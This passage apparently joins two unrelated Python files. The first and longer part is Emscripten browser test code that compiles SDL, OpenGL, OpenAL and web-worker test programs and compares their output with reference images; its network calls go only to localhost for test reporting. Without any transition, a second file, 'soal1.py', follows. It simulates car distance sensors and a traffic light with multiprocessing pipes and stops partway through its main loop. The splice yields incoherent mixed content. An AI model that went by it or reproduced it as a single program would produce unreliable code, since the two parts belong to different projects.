Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'VERBOSE=1'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'],
message='You should see an image with fog.')
def test_openal_playback(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'audio.wav'), os.path.join(self.get_dir(), 'audio.wav'))
open(os.path.join(self.get_dir(), 'openal_playback.cpp'), 'w').write(self.with_report_result(open(path_from_root('tests', 'openal_playback.cpp')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'openal_playback.cpp'), '--preload-file', 'audio.wav', '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_openal_buffers(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), os.path.join(self.get_dir(), 'the_entertainer.wav'))
self.btest('openal_buffers.c', '0', args=['--preload-file', 'the_entertainer.wav'],)
def test_glfw(self):
open(os.path.join(self.get_dir(), 'glfw.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'glfw.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'glfw.c'), '-o', 'page.html', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def get_freealut_library(self):
if WINDOWS and Building.which('cmake'):
return self.get_library('freealut', os.path.join('hello_world.bc'), configure=['cmake', '.'], configure_args=['-DBUILD_TESTS=ON'])
else:
return self.get_library('freealut', os.path.join('examples', '.libs', 'hello_world.bc'), make_args=['EXEEXT=.bc'])
def test_freealut(self):
programs = self.get_freealut_library()
for program in programs:
assert os.path.exists(program)
Popen([PYTHON, EMCC, '-O2', program, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should hear "Hello World!"')
def test_worker(self):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''')
html_file.close()
# no file data
for file_data in [0, 1]:
print 'file data', file_data
output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) , stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('worker.js'), output
if not file_data: self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""")
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=1,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print full_es2
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=1,
args=['-DHAVE_BUILTIN_SINCOS'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print program
basename = os.path.basename(program)
args = []
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args = ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args = ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args)
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print source
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']'''])
def test_emscripten_api2(self):
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first');
open('file2.txt', 'w').write('second');
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']'''])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1')
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1')
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1')
def test_gc(self):
self.btest('browser_gc.cpp', '1')
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1')
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1')
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'])
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1'], reference_slack=1)
# Does not pass due to https://bugzilla.mozilla.org/show_bug.cgi?id=924264 so disabled for now.
# def test_gles2_uniform_arrays(self):
# self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1'], expected=['1'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840'], args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', reference='sdl_canvas_twice.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png'])
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', expected='1')
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc_crunch(self):
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'], stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1'])
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--pre-run', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1'])
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png')
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png')
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
def test_runtimelink(self):
return self.skip('BUILD_AS_SHARED_LIB=2 is deprecated')
main, supp = self.setup_runtimelink_test()
open(self.in_dir('supp.cpp'), 'w').write(supp)
Popen([PYTHON, EMCC, self.in_dir('supp.cpp'), '-o', 'supp.js', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'BUILD_AS_SHARED_LIB=2', '-O2', '-s', 'ASM_JS=0']).communicate()
shutil.move(self.in_dir('supp.js'), self.in_dir('supp.so'))
self.btest(main, args=['-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'RUNTIME_LINKED_LIBS=["supp.so"]', '-DBROWSER=1', '-O2', '-s', 'ASM_JS=0'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
def test_module(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
|
soal1.py | from fuzzy import command
from multiprocessing import Process,Pipe
import random
import time
def SensorDepan(depan):
Jdepan = random.randrange(1,100)
depan.send(Jdepan)
print('Jarak depan mobil : ',Jdepan,' cm')
depan.close()
def SensorBelakang(belakang):
Jbelakang = random.randrange(1,100)
belakang.send(Jbelakang)
print('Jarak belakang mobil : ',Jbelakang,' cm')
belakang.close()
def SensorKiri(kiri):
global Jkiri
Jkiri = random.randrange(1,100)
kiri.send(Jkiri)
print('Jarak kiri mobil : ',Jkiri,' cm')
kiri.close()
def SensorKanan(kanan):
Jkanan = random.randrange(1,100)
kanan.send(Jkanan)
print('Jarak kanan mobil : ',Jkanan,' cm')
kanan.close()
def SensorTraffic(traffic):
list = ['merah','kuning','hijau']
lampu = random.choice(list)
traffic.send(lampu)
print('Lampu traffic sedang : ',lampu)
traffic.close()
def Controller(depan,belakang,kiri,kanan,lampu):
DP = depan.recv()
BK = belakang.recv()
KI = kiri.recv()
KA = kanan.recv()
LP = lampu.recv()
print('--- Tindakan ---')
command(DP,BK,KI,KA,LP)
if __name__ == '__main__':
while(1):
depanIn,depanOut = Pipe()
belakangIn,belakangOut = Pipe()
kiriIn,kiriOut = Pipe()
kananIn,kananOut = Pipe()
lampuIn,lampuOut = Pipe()
KirimSensorDepan = Process(target=SensorDepan,args=(depanIn,))
KirimSensorBelakang = Process(target=SensorBelakang,args=(belakangIn,))
KirimSensorKiri = Process(target=SensorKiri,args=(kiriIn,))
